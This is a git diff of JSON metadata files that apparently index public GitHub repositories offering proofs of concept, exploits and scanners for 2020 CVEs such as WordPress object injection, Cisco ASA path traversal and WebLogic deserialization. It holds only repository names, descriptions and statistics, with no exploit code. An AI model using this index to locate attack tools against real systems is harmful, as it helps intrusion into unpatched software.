\ No newline at end of file
diff --git a/2020/CVE-2020-28032.json b/2020/CVE-2020-28032.json
new file mode 100644
index 0000000000..685303a8d3
--- /dev/null
+++ b/2020/CVE-2020-28032.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 428943414,
+ "name": "CVE-2020-28032_PoC",
+ "full_name": "nth347\/CVE-2020-28032_PoC",
+ "owner": {
+ "login": "nth347",
+ "id": 20441996,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4",
+ "html_url": "https:\/\/github.com\/nth347"
+ },
+ "html_url": "https:\/\/github.com\/nth347\/CVE-2020-28032_PoC",
+ "description": "PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)",
+ "fork": false,
+ "created_at": "2021-11-17T07:09:47Z",
+ "updated_at": "2024-05-29T18:15:46Z",
+ "pushed_at": "2021-11-17T07:43:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "deserialization-vulnerability",
+ "security-vulnerability",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28052.json b/2020/CVE-2020-28052.json
index 30848ac9d0..81a8095022 100644
--- a/2020/CVE-2020-28052.json
+++ b/2020/CVE-2020-28052.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 326754867,
+ "name": "CVE-2020-28052_PoC",
+ "full_name": "kurenaif\/CVE-2020-28052_PoC",
+ "owner": {
+ "login": "kurenaif",
+ "id": 3713845,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3713845?v=4",
+ "html_url": "https:\/\/github.com\/kurenaif"
+ },
+ "html_url": "https:\/\/github.com\/kurenaif\/CVE-2020-28052_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-04T17:13:39Z",
+ "updated_at": "2021-01-06T16:12:43Z",
+ "pushed_at": "2021-01-06T15:40:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-28148.json b/2020/CVE-2020-28148.json
new file mode 100644
index 0000000000..edcb2c24bf
--- /dev/null
+++ b/2020/CVE-2020-28148.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 432963715,
+ "name": "CVE-2020-28148",
+ "full_name": "fengchenzxc\/CVE-2020-28148",
+ "owner": {
+ "login": "fengchenzxc",
+ "id": 41096522,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41096522?v=4",
+ "html_url": "https:\/\/github.com\/fengchenzxc"
+ },
+ "html_url": "https:\/\/github.com\/fengchenzxc\/CVE-2020-28148",
+ "description": "攻击WIFI的常用方式",
+ "fork": false,
+ "created_at": "2021-11-29T08:38:27Z",
+ "updated_at": "2024-06-21T00:09:40Z",
+ "pushed_at": "2021-11-29T08:57:39Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28488.json b/2020/CVE-2020-28488.json
new file mode 100644
index 0000000000..7463fdd50a
--- /dev/null
+++ b/2020/CVE-2020-28488.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 332742743,
+ "name": "CVE-2020-28488",
+ "full_name": "rafaelcintralopes\/CVE-2020-28488",
+ "owner": {
+ "login": "rafaelcintralopes",
+ "id": 1049012,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1049012?v=4",
+ "html_url": "https:\/\/github.com\/rafaelcintralopes"
+ },
+ "html_url": "https:\/\/github.com\/rafaelcintralopes\/CVE-2020-28488",
+ "description": "Denial of Service (DoS) - jQuery UI 1.12.1 - Exploit",
+ "fork": false,
+ "created_at": "2021-01-25T12:39:14Z",
+ "updated_at": "2021-01-25T13:24:56Z",
+ "pushed_at": "2021-01-25T13:24:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28502.json b/2020/CVE-2020-28502.json
new file mode 100644
index 0000000000..3a575bcc99
--- /dev/null
+++ b/2020/CVE-2020-28502.json
@@ -0,0 +1,67 @@
+[
+ {
+ "id": 366703109,
+ "name": "CVE-2020-28502",
+ "full_name": "s-index\/CVE-2020-28502",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2020-28502",
+ "description": "CVE-2020-28502 node-XMLHttpRequest RCE",
+ "fork": false,
+ "created_at": "2021-05-12T12:11:03Z",
+ "updated_at": "2023-11-07T14:22:06Z",
+ "pushed_at": "2021-05-12T12:18:50Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-28502",
+ "poc",
+ "rce",
+ "xmlhttprequest"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 390319299,
+ "name": "CVE-2020-28502",
+ "full_name": "dpredrag\/CVE-2020-28502",
+ "owner": {
+ "login": "dpredrag",
+ "id": 3372646,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3372646?v=4",
+ "html_url": "https:\/\/github.com\/dpredrag"
+ },
+ "html_url": "https:\/\/github.com\/dpredrag\/CVE-2020-28502",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-28T11:01:56Z",
+ "updated_at": "2021-07-28T11:03:19Z",
+ "pushed_at": "2021-07-28T11:03:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28653.json b/2020/CVE-2020-28653.json
new file mode 100644
index 0000000000..4cc69a52aa
--- /dev/null
+++ b/2020/CVE-2020-28653.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 391357341,
+ "name": "CVE-2020-28653",
+ "full_name": "tuo4n8\/CVE-2020-28653",
+ "owner": {
+ "login": "tuo4n8",
+ "id": 21272757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4",
+ "html_url": "https:\/\/github.com\/tuo4n8"
+ },
+ "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2020-28653",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-31T13:00:15Z",
+ "updated_at": "2023-07-13T09:42:39Z",
+ "pushed_at": "2022-03-09T02:57:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 406067197,
+ "name": "cve-2020-28653-poc",
+ "full_name": "intrigueio\/cve-2020-28653-poc",
+ "owner": {
+ "login": "intrigueio",
+ "id": 7463185,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7463185?v=4",
+ "html_url": "https:\/\/github.com\/intrigueio"
+ },
+ "html_url": "https:\/\/github.com\/intrigueio\/cve-2020-28653-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-13T17:27:02Z",
+ "updated_at": "2022-02-05T08:04:25Z",
+ "pushed_at": "2021-11-16T17:30:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 479014774,
+ "name": "ManageEngine-CVE-2020-28653",
+ "full_name": "mr-r3bot\/ManageEngine-CVE-2020-28653",
+ "owner": {
+ "login": "mr-r3bot",
+ "id": 37280106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37280106?v=4",
+ "html_url": "https:\/\/github.com\/mr-r3bot"
+ },
+ "html_url": "https:\/\/github.com\/mr-r3bot\/ManageEngine-CVE-2020-28653",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-07T14:13:29Z",
+ "updated_at": "2022-04-15T04:15:35Z",
+ "pushed_at": "2022-04-15T04:15:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-2883.json b/2020/CVE-2020-2883.json
index b252226aaf..5436424174 100644
--- a/2020/CVE-2020-2883.json
+++ b/2020/CVE-2020-2883.json
@@ -108,10 +108,10 @@
"description": "WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册蚁剑filter内存shell",
"fork": false,
"created_at": "2020-08-19T03:34:06Z",
- "updated_at": "2024-05-21T08:50:49Z",
+ "updated_at": "2024-06-26T00:39:16Z",
"pushed_at": "2020-08-25T03:17:32Z",
- "stargazers_count": 530,
- "watchers_count": 530,
+ "stargazers_count": 531,
+ "watchers_count": 531,
"has_discussions": false,
"forks_count": 62,
"allow_forking": true,
@@ -120,7 +120,7 @@
"topics": [],
"visibility": "public",
"forks": 62,
- "watchers": 530,
+ "watchers": 531,
"score": 0,
"subscribers_count": 8
},
@@ -186,5 +186,35 @@
"watchers": 6,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 428189487,
+ "name": "POC_CVE-2020-2883",
+ "full_name": "Qynklee\/POC_CVE-2020-2883",
+ "owner": {
+ "login": "Qynklee",
+ "id": 23394219,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23394219?v=4",
+ "html_url": "https:\/\/github.com\/Qynklee"
+ },
+ "html_url": "https:\/\/github.com\/Qynklee\/POC_CVE-2020-2883",
+ "description": "POC for CVE-2020-2883",
+ "fork": false,
+ "created_at": "2021-11-15T08:56:44Z",
+ "updated_at": "2021-11-15T09:17:59Z",
+ "pushed_at": "2021-11-15T09:17:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-28874.json b/2020/CVE-2020-28874.json
new file mode 100644
index 0000000000..8f5f8a56d9
--- /dev/null
+++ b/2020/CVE-2020-28874.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 331631898,
+ "name": "CVE-2020-28874",
+ "full_name": "varandinawer\/CVE-2020-28874",
+ "owner": {
+ "login": "varandinawer",
+ "id": 9851011,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9851011?v=4",
+ "html_url": "https:\/\/github.com\/varandinawer"
+ },
+ "html_url": "https:\/\/github.com\/varandinawer\/CVE-2020-28874",
+ "description": "CVE-2020-28874",
+ "fork": false,
+ "created_at": "2021-01-21T13:11:30Z",
+ "updated_at": "2021-01-21T13:31:12Z",
+ "pushed_at": "2021-01-21T13:29:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28926.json b/2020/CVE-2020-28926.json
new file mode 100644
index 0000000000..828891def2
--- /dev/null
+++ b/2020/CVE-2020-28926.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 344263881,
+ "name": "exploit-CVE-2020-28926",
+ "full_name": "lorsanta\/exploit-CVE-2020-28926",
+ "owner": {
+ "login": "lorsanta",
+ "id": 48159385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48159385?v=4",
+ "html_url": "https:\/\/github.com\/lorsanta"
+ },
+ "html_url": "https:\/\/github.com\/lorsanta\/exploit-CVE-2020-28926",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-03T21:06:56Z",
+ "updated_at": "2022-03-13T11:21:19Z",
+ "pushed_at": "2021-03-03T21:26:34Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-28948.json b/2020/CVE-2020-28948.json
index 8fb01fe6f3..e1308f7872 100644
--- a/2020/CVE-2020-28948.json
+++ b/2020/CVE-2020-28948.json
@@ -29,6 +29,36 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 370402145,
+ "name": "cve-2020-28948",
+ "full_name": "nopdata\/cve-2020-28948",
+ "owner": {
+ "login": "nopdata",
+ "id": 26320567,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26320567?v=4",
+ "html_url": "https:\/\/github.com\/nopdata"
+ },
+ "html_url": "https:\/\/github.com\/nopdata\/cve-2020-28948",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-24T15:36:16Z",
+ "updated_at": "2021-05-24T15:39:06Z",
+ "pushed_at": "2021-05-24T15:39:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 544836274,
"name": "PoC-for-CVE-2020-28948-CVE-2020-28949",
diff --git a/2020/CVE-2020-2950.json b/2020/CVE-2020-2950.json
new file mode 100644
index 0000000000..b911eed697
--- /dev/null
+++ b/2020/CVE-2020-2950.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 369458782,
+ "name": "CVE-2020-2950",
+ "full_name": "tuo4n8\/CVE-2020-2950",
+ "owner": {
+ "login": "tuo4n8",
+ "id": 21272757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4",
+ "html_url": "https:\/\/github.com\/tuo4n8"
+ },
+ "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2020-2950",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-21T07:57:50Z",
+ "updated_at": "2024-04-16T14:55:40Z",
+ "pushed_at": "2021-09-29T15:28:01Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-29583.json b/2020/CVE-2020-29583.json
new file mode 100644
index 0000000000..1133a39ac0
--- /dev/null
+++ b/2020/CVE-2020-29583.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 326532749,
+ "name": "scan_CVE-2020-29583",
+ "full_name": "ruppde\/scan_CVE-2020-29583",
+ "owner": {
+ "login": "ruppde",
+ "id": 46819580,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46819580?v=4",
+ "html_url": "https:\/\/github.com\/ruppde"
+ },
+ "html_url": "https:\/\/github.com\/ruppde\/scan_CVE-2020-29583",
+ "description": "Scanner for Zyxel products which are potentially vulnerable due to an undocumented user account (CVE-2020-29583)",
+ "fork": false,
+ "created_at": "2021-01-04T00:56:55Z",
+ "updated_at": "2024-04-01T21:17:42Z",
+ "pushed_at": "2021-01-04T22:55:37Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-29599.json b/2020/CVE-2020-29599.json
new file mode 100644
index 0000000000..a7d4448f9e
--- /dev/null
+++ b/2020/CVE-2020-29599.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 452904923,
+ "name": "CVE-2020-29599",
+ "full_name": "coco0x0a\/CVE-2020-29599",
+ "owner": {
+ "login": "coco0x0a",
+ "id": 96345719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4",
+ "html_url": "https:\/\/github.com\/coco0x0a"
+ },
+ "html_url": "https:\/\/github.com\/coco0x0a\/CVE-2020-29599",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-28T01:45:07Z",
+ "updated_at": "2022-03-11T05:03:36Z",
+ "pushed_at": "2022-01-28T01:59:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-29607.json b/2020/CVE-2020-29607.json
index 17c3ebc7b2..e42f554e50 100644
--- a/2020/CVE-2020-29607.json
+++ b/2020/CVE-2020-29607.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 499937180,
+ "name": "CVE-2020-29607",
+ "full_name": "0xAbbarhSF\/CVE-2020-29607",
+ "owner": {
+ "login": "0xAbbarhSF",
+ "id": 67552744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4",
+ "html_url": "https:\/\/github.com\/0xAbbarhSF"
+ },
+ "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2020-29607",
+ "description": "A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the \"manage files\" functionality, which may result in remote code execution.",
+ "fork": false,
+ "created_at": "2022-06-04T21:09:38Z",
+ "updated_at": "2024-06-23T17:59:53Z",
+ "pushed_at": "2022-06-04T21:11:13Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 722884365,
"name": "CVE-2020-29607",
diff --git a/2020/CVE-2020-3187.json b/2020/CVE-2020-3187.json
index 184a5d41be..ef194f559c 100644
--- a/2020/CVE-2020-3187.json
+++ b/2020/CVE-2020-3187.json
@@ -59,6 +59,36 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 376723994,
+ "name": "CVE-2020-3187",
+ "full_name": "sujaygr8\/CVE-2020-3187",
+ "owner": {
+ "login": "sujaygr8",
+ "id": 39243813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39243813?v=4",
+ "html_url": "https:\/\/github.com\/sujaygr8"
+ },
+ "html_url": "https:\/\/github.com\/sujaygr8\/CVE-2020-3187",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-14T06:27:11Z",
+ "updated_at": "2021-06-14T06:46:19Z",
+ "pushed_at": "2021-06-14T06:46:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 613802592,
"name": "CVE-2020-3187-Scanlist",
diff --git a/2020/CVE-2020-3452.json b/2020/CVE-2020-3452.json
index 6d411ae804..0fdaec2f25 100644
--- a/2020/CVE-2020-3452.json
+++ b/2020/CVE-2020-3452.json
@@ -403,6 +403,224 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 327027118,
+ "name": "CISCO-CVE-2020-3452-Scanner-Exploiter",
+ "full_name": "darklotuskdb\/CISCO-CVE-2020-3452-Scanner-Exploiter",
+ "owner": {
+ "login": "darklotuskdb",
+ "id": 29382875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29382875?v=4",
+ "html_url": "https:\/\/github.com\/darklotuskdb"
+ },
+ "html_url": "https:\/\/github.com\/darklotuskdb\/CISCO-CVE-2020-3452-Scanner-Exploiter",
+ "description": "CISCO CVE-2020-3452 Scanner & Exploiter",
+ "fork": false,
+ "created_at": "2021-01-05T14:41:13Z",
+ "updated_at": "2024-06-20T08:00:20Z",
+ "pushed_at": "2021-07-29T09:28:20Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 30,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 30,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 335520796,
+ "name": "Cisco-ASA-FTD-Web-Services-Traversal",
+ "full_name": "fuzzlove\/Cisco-ASA-FTD-Web-Services-Traversal",
+ "owner": {
+ "login": "fuzzlove",
+ "id": 44779781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4",
+ "html_url": "https:\/\/github.com\/fuzzlove"
+ },
+ "html_url": "https:\/\/github.com\/fuzzlove\/Cisco-ASA-FTD-Web-Services-Traversal",
+ "description": "CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) traversal",
+ "fork": false,
+ "created_at": "2021-02-03T05:45:53Z",
+ "updated_at": "2024-04-25T05:17:46Z",
+ "pushed_at": "2021-02-03T12:19:16Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "penetration-testing"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 336020236,
+ "name": "Cisco-CVE-2020-3452-shodan-scanner",
+ "full_name": "faisalfs10x\/Cisco-CVE-2020-3452-shodan-scanner",
+ "owner": {
+ "login": "faisalfs10x",
+ "id": 51811615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4",
+ "html_url": "https:\/\/github.com\/faisalfs10x"
+ },
+ "html_url": "https:\/\/github.com\/faisalfs10x\/Cisco-CVE-2020-3452-shodan-scanner",
+ "description": "simple bash script of CVE-2020-3452 Cisco ASA \/ Firepower Read-Only Path Traversal Vulnerability checker ",
+ "fork": false,
+ "created_at": "2021-02-04T16:50:27Z",
+ "updated_at": "2023-04-22T21:34:29Z",
+ "pushed_at": "2021-02-04T17:38:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-3452",
+ "exploit",
+ "poc",
+ "shodan-dorks"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 375576943,
+ "name": "CVE-2020-3452",
+ "full_name": "sujaygr8\/CVE-2020-3452",
+ "owner": {
+ "login": "sujaygr8",
+ "id": 39243813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39243813?v=4",
+ "html_url": "https:\/\/github.com\/sujaygr8"
+ },
+ "html_url": "https:\/\/github.com\/sujaygr8\/CVE-2020-3452",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-10T05:09:52Z",
+ "updated_at": "2021-06-14T07:36:50Z",
+ "pushed_at": "2021-06-14T07:36:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 424128615,
+ "name": "CVE-2020-3452",
+ "full_name": "Aviksaikat\/CVE-2020-3452",
+ "owner": {
+ "login": "Aviksaikat",
+ "id": 31238298,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31238298?v=4",
+ "html_url": "https:\/\/github.com\/Aviksaikat"
+ },
+ "html_url": "https:\/\/github.com\/Aviksaikat\/CVE-2020-3452",
+ "description": "Test vulnerability of CVE-2020-3452",
+ "fork": false,
+ "created_at": "2021-11-03T07:27:14Z",
+ "updated_at": "2023-02-06T13:44:50Z",
+ "pushed_at": "2021-11-03T09:04:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 446508911,
+ "name": "CVE-2020-3452_auto",
+ "full_name": "Veids\/CVE-2020-3452_auto",
+ "owner": {
+ "login": "Veids",
+ "id": 13793356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13793356?v=4",
+ "html_url": "https:\/\/github.com\/Veids"
+ },
+ "html_url": "https:\/\/github.com\/Veids\/CVE-2020-3452_auto",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-10T16:56:40Z",
+ "updated_at": "2022-01-10T16:58:25Z",
+ "pushed_at": "2022-01-10T16:58:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 489632798,
+ "name": "cve-2020-3452",
+ "full_name": "iveresk\/cve-2020-3452",
+ "owner": {
+ "login": "iveresk",
+ "id": 28754633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4",
+ "html_url": "https:\/\/github.com\/iveresk"
+ },
+ "html_url": "https:\/\/github.com\/iveresk\/cve-2020-3452",
+ "description": "Just proof of concept for Cisco CVE-2020-3452. Using external or internal file base.",
+ "fork": false,
+ "created_at": "2022-05-07T09:45:25Z",
+ "updated_at": "2022-05-07T09:47:56Z",
+ "pushed_at": "2022-05-07T09:47:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 762922498,
"name": "CVE-2020-3452",
diff --git a/2020/CVE-2020-35191.json b/2020/CVE-2020-35191.json
new file mode 100644
index 0000000000..a1d9de2e2f
--- /dev/null
+++ b/2020/CVE-2020-35191.json
@@ -0,0 +1,49 @@
+[
+ {
+ "id": 441536984,
+ "name": "MegaHiDocker",
+ "full_name": "megadimenex\/MegaHiDocker",
+ "owner": {
+ "login": "megadimenex",
+ "id": 96182749,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96182749?v=4",
+ "html_url": "https:\/\/github.com\/megadimenex"
+ },
+ "html_url": "https:\/\/github.com\/megadimenex\/MegaHiDocker",
+ "description": "This project is exploit for some docker containers with similar to vulnerability code: CVE-2020-35191",
+ "fork": false,
+ "created_at": "2021-12-24T18:59:31Z",
+ "updated_at": "2021-12-29T12:23:10Z",
+ "pushed_at": "2021-12-29T12:21:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
